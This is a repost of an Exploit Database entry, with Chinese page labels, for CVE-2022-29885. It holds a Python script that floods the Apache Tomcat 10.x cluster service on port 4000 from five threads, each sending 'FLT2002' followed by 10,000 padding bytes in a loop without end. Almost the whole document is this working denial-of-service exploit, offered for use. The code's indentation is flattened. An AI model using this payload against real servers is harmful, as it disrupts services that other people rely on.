Apache Tomcat 10.1 – Denial Of Service

• Exploit Database
• 17 阅读

• 作者： Cristian Giustini
  日期： 2023-04-05
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51262/

• # Exploit Title:Apache Tomcat 10.1 - Denial Of Service
  # Google Dork: N/A
  # Date: 13/07/2022
  # Exploit Author: Cristian 'void' Giustini
  # Vendor Homepage: https://tomcat.apache.org/
  # Software Link: https://tomcat.apache.org/download-10.cgi
  # Version: <= 10.1
  # Tested on: Apache Tomcat 10.0 (Docker)
  # CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
  # Exploit pre-requirements: pip install pwntools==4.8.0
  # Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/ 
  
   
  
   
  
  #!/usr/bin/env python3
  
  # coding: utf-8
  
  from pwn import *
  
  import time
  
  import threading
  
  import subprocess
  
  threads = []
  
   
  
   
  
  def send_payload():
  
  r = remote("localhost", 4000)
  
  while True:
  
  r.send(b"FLT2002" + b"A" * 10000)
  
   
  
  for _ in range(5):
  
  new_thread = threading.Thread(target=send_payload)
  
  threads.append(new_thread)
  
  new_thread.start()
  
  for old_thread in threads:
  
  old_thread.join()